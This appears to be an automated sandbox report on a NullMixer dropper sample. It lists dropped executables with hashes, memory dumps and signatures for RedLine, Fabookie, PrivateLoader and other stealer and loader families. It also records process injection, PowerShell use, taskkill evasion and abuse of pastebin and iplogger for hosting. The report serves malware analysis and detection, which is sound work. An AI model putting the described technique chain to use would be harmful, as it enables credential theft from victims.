SHA256 b7fd0c0227a445847a051fe986bc517e2b136682d98dbe5349e2bc75e0e9e4ec
SHA512 4117875063173b5767b98300d493e2aee310a76651411ceb2f34588ae5785a0893979699c10e07d0f52d84442db6967b7155875bc7ef738a8e2c49fa70acd1f2

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06384ea2548.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe

MD5 a4bf9671a96119f7081621c2f2e8807d
SHA1 47f50ae20bfa8b277f8c8c1963613d3f4c364b94
SHA256 d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7
SHA512 f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0639114ac9fa.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068cfd71e196da.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06d8092a5ae.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P156RKKE6NHSISTNHGDL.temp

MD5 83e9e25dde4e7decee78c786b780f76c
SHA1 34be6aede0a62330000771c7a44b3aeff032342e
SHA256 b0944d40ea1d27ed776764e7d2cb089a59ada01da1bea2bfac21862c9ac2e2ec
SHA512 821ed0eaf421c6c51e7ff1dcc901f30eda2a27585f59f8be8cd22837d06f259ce12db37387b83ba7bcd3b4dca10f3746d0c7fd3540f121aad9a9afb74662946c

memory/1328-142-0x0000000000400000-0x0000000000414000-memory.dmp

memory/692-143-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/1772-145-0x0000000000B30000-0x0000000000B38000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-V7F3J.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2100-151-0x0000000000E20000-0x0000000000E90000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-V7F3J.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/2732-159-0x0000000000350000-0x0000000000356000-memory.dmp

memory/580-150-0x0000000000290000-0x0000000000300000-memory.dmp

memory/2732-149-0x0000000000310000-0x0000000000326000-memory.dmp

memory/1800-141-0x0000000000400000-0x00000000004BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe

MD5 508251b34a5ea5271e6c8d365b3623d2
SHA1 a6f057ba3154fca2a2000cbb7ee9c171c682a8ac
SHA256 a111e371822094423c652cef67b75663d97e7d7a18c33213d745a1f2075d210f
SHA512 981e33ee2c1d699304165d7d96af3de99509b7dc0ce6f7a3e49c763f58ae4227f1d60056997adc366de9203d86d469de3062542b2ba147303848d6e4d26bf170

memory/2776-178-0x0000000000B70000-0x0000000000CCD000-memory.dmp

memory/1328-90-0x0000000000400000-0x0000000000414000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC12262D6\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/888-179-0x0000000000400000-0x0000000000422000-memory.dmp

memory/888-191-0x0000000000400000-0x0000000000422000-memory.dmp

memory/888-189-0x0000000000400000-0x0000000000422000-memory.dmp

memory/888-188-0x0000000000400000-0x0000000000422000-memory.dmp

memory/888-187-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/888-183-0x0000000000400000-0x0000000000422000-memory.dmp

memory/888-185-0x0000000000400000-0x0000000000422000-memory.dmp

memory/888-181-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2640-192-0x0000000000400000-0x000000000051C000-memory.dmp

memory/2640-199-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2640-201-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2640-200-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2776-202-0x0000000002AC0000-0x0000000002B67000-memory.dmp

memory/2640-198-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2640-196-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2776-204-0x0000000002B70000-0x0000000002C04000-memory.dmp

memory/2776-206-0x0000000002B70000-0x0000000002C04000-memory.dmp

memory/2776-203-0x0000000002B70000-0x0000000002C04000-memory.dmp

memory/1156-217-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1156-219-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1156-216-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1156-215-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1156-213-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1156-211-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1156-209-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2724-220-0x0000000000400000-0x0000000002DAA000-memory.dmp

memory/992-223-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/692-222-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2776-224-0x0000000000B70000-0x0000000000CCD000-memory.dmp

memory/2776-231-0x0000000002B70000-0x0000000002C04000-memory.dmp

memory/2776-233-0x0000000004BD0000-0x0000000004C5D000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240903-en

Max time kernel

148s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0619212f22dd7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0619212f22dd7.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0647140c100d63.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0647140c100d63.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0618d93ac2c5c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0618d93ac2c5c.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0675f75df01bdb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0675f75df01bdb.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2056 set thread context of 1656 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f78aa43.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0619212f22dd7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0647140c100d63.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\control.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0675f75df01bdb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0618d93ac2c5c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f7871e5.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06ebc37d1c94352.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2684 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe
PID 2684 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe
PID 2684 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe
PID 2684 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe
PID 2684 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe
PID 2684 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe
PID 2684 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe
PID 2812 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
